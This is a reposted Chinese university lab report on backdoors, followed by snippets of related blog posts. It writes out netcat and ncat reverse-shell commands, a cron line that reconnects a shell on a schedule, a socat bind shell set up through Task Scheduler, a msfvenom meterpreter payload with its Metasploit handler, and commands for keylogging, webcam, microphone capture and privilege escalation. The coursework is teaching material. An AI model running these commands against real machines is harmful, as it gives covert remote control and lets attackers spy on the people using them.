20155301实验二 后门原理与实践

最新推荐文章于 2020-10-22 18:41:20 发布
最新推荐文章于 2020-10-22 18:41:20 发布
阅读量295 收藏
点赞数
文章标签: 操作系统 shell
原文链接:http://www.cnblogs.com/fengxingck/p/8688427.html
版权

20155301实验二 后门原理与实践

基础问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:浏览网站所附带的软件,或者在不正规的下载网站下载软件。
(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:通过开机自动运行脚本或者和程序绑定的方式运行。

(3)Meterpreter有哪些给你映像深刻的功能

答:抓取屏幕,打开摄像机和录像,感觉很恐怖。

(4)如何发现自己有系统有没有被安装后门

答:通过任务管理器查看有没有陌生的程序在运行,或者利用杀毒软件查杀。

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

实验过程

预备任务:Windows获得Linux Shell、Linux获得Windows Shell

1.在Windows中需要载ncat.rar,解压后即可使用

2.利用命令行进入刚刚解压ncat的目录。

3.利用 ncat.exe -l -p 8888 命令打开端口号为8888的端口

4.利用nc 192.168.229.129 5301 -e /bin/sh 在Linux反弹连接windows。
1072918-20180401212903538-1998431029.png

1.Linux获得Windows Shell的过程同理,在Linux运行监听指令:nc -l -p 7777 打开端口

2.利用ncat.exe -e cmd.exe 192.229.229.130 指令Windows反弹连接Linux

1072918-20180401212913513-996133123.png

任务一:使用netcat获取主机操作Shell,cron启动

1.首先在Windows中下载scat,解压

2.使用crontab -e命令编辑配置文件,在最后一行或第一行添加指令04 * * * * /bin/netcat 192.168.229.130 5301 -e /bin/sh
1072918-20180401212922684-561605997.png

任务二:使用socat获取主机操作Shell, 任务计划启动

1.在windows中,右键单击计算机,打开管理->系统工具->任务计划程序,单击创建基本任务,填写任务名称,设置触发器为当前用户登录时,设置操作为启动程序,选择启动程序为socat.exe,参数设置为tcp-listen:5301 exec:cmd.exe,pty,stderr

这步操作的作用是把cmd绑定到端口5212,同时把cmd的Stderr复位向到stdout

1072918-20180401212932351-2070936825.png

2.注销当前用户,并重新登录,之前创建的程序和设置的参数会自动填入运行
1072918-20180401212940710-57009593.png

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中利用如下命令创建一个名为5301的后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.129 LPORT=5301 -f exe > 20155301.exe

1072918-20180401212952426-1401002538.png

2.将其通过ncat,传送到主机,在Windows中使用命令ncat.exe -l 5301 > 20155301.exe,在Kali中使用命令:nc 192.168.229.130 5301 < 20155301.exe,这样就传送过来了。

3.MSF打开监听,输入如下指令

root@5301:~# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.229.130
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > exploit

1072918-20180401213003370-1035383697.png

4.在win7打开生成5301.exe的程序,回到kali,终端提示
1072918-20180401213013831-465002630.png

5.尝试使用命令dir,成功显示windows中的文件夹
1072918-20180401213026111-1935935686.png

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

命令用途
keyscan_start启动键盘记录
keyscan_dump键盘记录软件的内容转储
keyscan_stop停止键盘记录软件
record_mic使用默认麦克风录音
webcam_snap拍照
webcam_stream录像
getsystem提权

获取主机音频
获取击键记录
1072918-20180401213205573-545285302.png

实验总结与体会

这次实验并不困难,但是所达到的效果非常让我震惊,没有想到这么简单就可以进入别人的电脑并且获取你屏幕的截图甚至录像等等,这使我更加认识到了学好专业的重要性,也是我意识到网络中充斥的各种后门木马,在今后的上网或者下载中会更加的谨慎,也更加的重视定期杀毒的重要性。

转载于:https://www.cnblogs.com/fengxingck/p/8688427.html

weixin_33811539
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻击后访问维持(后门实验
weixin_43916678的博客
01-13 697
实验原理 netcat介绍 netccat是一个通过TCP/UDP在网络中进行读写数据工具(命令),被称为“瑞士军刀”,主要用于调试领域、传输领域甚至黑客攻击领域。利用该工具,可以将网络中一端的数据完整的发送至另一台主机终端显示或存储,常见的应用为文件传输、与好友即时通信、传输流媒体或者作为用来验证服务器的独立的客户端。当然,也可以在脚本中使用该工具。 netcat常用功能: 1)端口扫描 查看某IP端口开放状态 命令:netcat -v ip port 查看某IP的端口段(注意扫描速度会很慢) 命令:n
基于伟福实验箱LAB9000的智能家庭报警系统设计.docx
06-17
该文档是关于基于伟福实验箱LAB9000设计的...这个系统设计结合了理论知识与实践应用,不仅涵盖了单片机编程,还涉及到传感器应用、系统集成和用户界面设计,对于学习嵌入式系统开发和智能家庭安全有着很好的示例作用。
后门原理实践
weixin_30815469的博客
05-27 206
后门的定义 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 1编译器留后门 2操作系统后门 3最常见的当然还是应用程序中留后门 4还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 实验准备 1、把虚拟机kali的网络改为桥接 2、修改windows控制台的编码方式 法一:在cmd中输入 CHCP 65001(临时转码,不可永久) 法:修改regedit...
20145239《网络对抗》- 后门原理实践
weixin_30757793的博客
03-18 102
《网络对抗》—后门原理实践 基础问题回答   1. 例举你能想到的一个后门进入到你系统中的可能方式? 我下载了一款游戏或者软件其中有一个不明的程序是捆绑的后门程序。   2. 例举你知道的后门如何启动起来(win及linux)的方式? Win中的管理工具中可以设置时间点,令任务按计划启动,或者可以伪装成别的程序骗用户点开运行,网页木马。 Linux下通过cron启动。 ...
20165306 Exp2 后门原理实践
weixin_33787529的博客
03-23 208
20165306 Exp2 后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内...
NC连接实验原理(win2003).pdf
07-11
### 实验原理与应用 - **实验环境**: 通常在安全实验教学系统中,NC会被用于模拟攻击或防御场景,让学生理解网络连接的原理和安全风险。 - **安全考虑**: 使用NC时需谨慎,因为它可以用于非法活动,如端口扫描、数据...
基于python的系统后门(内含源码和实验报告).zip
12-11
这个项目不仅提供了实际的代码实现,还包含了一个实验报告,意味着它可能是教学或学习过程中的一个实践环节,用于深入理解和研究网络安全相关的技术。 【描述解析】 描述中提到的是"基于python的课程设计(内含源码...
华中科技大学网络安全大三下网安三级通关综合实验
08-10
实验问题分析与总结:软件逆向是软件安全中的一种非常重要的技术,通过逆向软件,可以了解软件的内部机理和工作原理,掌握软件的安全性和漏洞。 建议与意见:在实际应用中,软件逆向可以用于软件安全测试和漏洞检测...
网络安全实验(20210919173357).pdf
09-26
网络安全实验通过实际操作,帮助学生理解网络攻防的基本原理和技术,强调信息收集的重要性以及防范潜在威胁的必要性。通过这两个实验,学生可以学习到如何使用各种工具和命令来保护网络资源,防止未经授权的访问和...
(((Shift后门利用工具)))
03-02
Shift后门利用工具 Shift后门利用工具 Shift后门利用工具
2018-2019-2 网络对抗技术 20165335 Exp2 后门原理实践
weixin_34365635的博客
03-22 126
一.基础问题回答:   (1)例举你能想到的一个后门进入到你系统中的可能方式?     钓鱼网站:搞一个假网站,假淘宝,盗版电影,文库下载文档什么的,下载东西的时候把带隐藏的后门程序附带下载进去,自启动,反弹连接。     搞一个小网站,用iframe标签跳转到危险网页,自动下载程序。   (2)例举你知道的后门如何启动起来(win及linux)的方式?     修改注册表,开机的时候自...
20155328 《网络攻防》实验后门原理实践
weixin_34221332的博客
04-02 562
20155328 《网络攻防》实验后门原理实践 实验问题回答 1.列举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站上下载软件时候的捆绑运行。 2.列举你知道的后门如何启动起来(win及linux)的方式? 恶意用户远程控制。 3.Meterpreter有哪些给你映像深刻的功能? 抓取摄像头,感觉像电影里的黑客镜头一样,很炫酷。还有击键记录。 4.如何发现自己有系统有没有被安装后...
Exp2 后门原理实践 20164309
a569847381的博客
03-22 351
准备工作: 使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130 使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131 实验内容 一、使用nc或netcat远程获取shell (1)win获得Linux shell 1.windows打开监听 进入文件夹 cd netcat ...
20145226夏艺华 后门原理实践
weixin_30809173的博客
03-18 207
20145226夏艺华 后门原理实践 实验主要内容 使用ncat、socat实现两台电脑间的后门连接;meterpreter的应用;MSF POST模块的使用 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? · 攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门。 · 攻击者攻陷一台主机,获...
Exp2 后门原理实践 20164320 王浩
weixin_34080571的博客
03-24 221
一、实践基本内容 1.实践目标 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝...
wmi后门的简单实验
ailx10
10-22 232
一晃一天过去了,操作系统后门实验也接近尾声了,感谢大家一路的支持。失败不是悲剧,放弃才是。加油,白帽子黑客~ailx10:第一个windows后门(粘滞键后门) ailx10:「后渗透测试」神器Empire入门 ailx10:「计划任务后门」问题出在哪? ailx10:注册表注入后门的简单实验实验基于上一个实验,如果发现运行的时候,提示上下文不对那基本上就是权限不够,需要提权是的,wmi后门...
20155201 《网络对抗技术》 实验 后门原理实践
weixin_30401605的博客
03-29 143
20155201 《网络对抗技术》 实验 后门原理实践 零、实验准备 1. Windows获得kali linux shell 在Windows命令行中,使用ipconfig查看本机IP:10.211.55.6 先使用cd ncat命令进入程序所在目录,ncat.exe -l -p 5201使用ncat程序监听本机的5201端口 在Kali终端中,使用nc 10.211.55.6 -e /b...
shift后门的一个分析
I'm a hack----
07-01 1307
<br />有关shift后门的激活方式,目前发现的就这么几种<br />1.使用键盘事件通过快捷键激活<br />2.使用鼠标事件通过单击或双击界面某处激活<br />3.使用键盘事件及鼠标事件相结合的方式激活<br />  以上所说的是高防后门的激活方式,rar自解压的不在此范围之内,后门的编程语言目前发现以vb,delphi和c++等语言为主.对<br />  于shift后门的破解,网上鲜见教程,曾经搜索了很久,只好自己摸索.也曾在华夏77169发布过两篇vb后门的破解过程.废话不多<br />说,
Distcc后门漏洞原理
最新发布
04-03
Distcc是一个分布式C/C++编译器,可以将编译任务分发到多台计算机上进行并行编译,加快编译速度。然而,Distcc存在一个后门漏洞,攻击者可以利用该漏洞在不经过授权的情况下获得远程执行权限。 该漏洞的原理是Distcc在默认情况下会监听一个TCP端口(默认为3632),并且没有对外部访问进行任何限制。攻击者可以通过直接连接该端口或者使用扫描工具扫描网络中开放的3632端口,来发现存在Distcc服务的计算机。 攻击者利用该漏洞的方法是,通过发送一个特定的编译请求到Distcc服务,该编译请求中包含了一个恶意的编译命令,例如执行一个恶意的Shell脚本或者下载并执行一个远程恶意程序。Distcc服务接收到该编译请求后会自动执行其中的命令,导致攻击者获得远程执行权限。 为了避免Distcc后门漏洞的风险,管理员可以通过以下措施进行防范: 1. 使用防火墙限制外部访问Distcc服务的TCP端口。 2. 配置Distcc服务只监听本地网络接口,不对外部网络开放服务。 3. 定期更新Distcc软件并及时应用安全补丁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值